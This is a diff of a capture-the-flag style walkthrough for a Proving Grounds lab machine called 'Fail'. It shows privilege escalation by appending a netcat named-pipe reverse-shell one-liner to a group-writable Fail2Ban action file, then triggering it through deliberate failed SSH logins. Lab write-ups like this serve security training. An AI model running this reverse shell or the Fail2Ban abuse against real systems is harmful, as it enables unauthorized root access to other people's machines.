Bsal13/Offensive-Security-Proving-Grounds-Boxes/Fail (Intermediate) Linux Box.md

 ## Privilege Escalation vector
 ## Fail2Ban group privelege escalation

-#### -Per steps above I navigated to "/etc/fail2ban/action.d" folder and typed "ls –la" and found group "fail2ban" has write priviliges on file "iptables-multiport-log.conf":
+- Following the preceding procedures, we enter "ls –la" into the "/etc/fail2ban/action.d" directory and discover that group "fail2ban" has write permissions on the file "iptables-multiport-log.conf":

 ![](Images/Pasted%20image%2020221016100412.png)

+- We type "vim iptables-multiport-log.conf"

-#### -Typed "vim iptables-multiport-log.conf" and typed "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc [my kali IP] >/tmp/f" to execute a reverse shell on port 85 (syntax found in www.revshells.com) towards the end of the file in vim
+- Next, in the file at the end, we input "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc [our kali IP] 85 >/tmp/f" to initiate a reverse shell on port 85.

 ![](Images/Pasted%20image%2020221016100629.png)

-#### -Ran a "penelope" listener on kali machine listening on port 85
+- On our Kali machine, we launch a "penelope" listener listening on port 85.

-#### -Typed "ssh @fox192.168.236.126" and typed in random passwords just to make "fail2ban" block my IP found in the steps to escalate privileges on the aforementioned website and then received a root shell on my "penelope" listener:
+- Then, we received a root shell on our penelope listener after entering "ssh @fox192.168.236.126" and entering random passwords to force "fail2ban" to block our IP address.

 ![](Images/Pasted%20image%2020221016111525.png)
 ---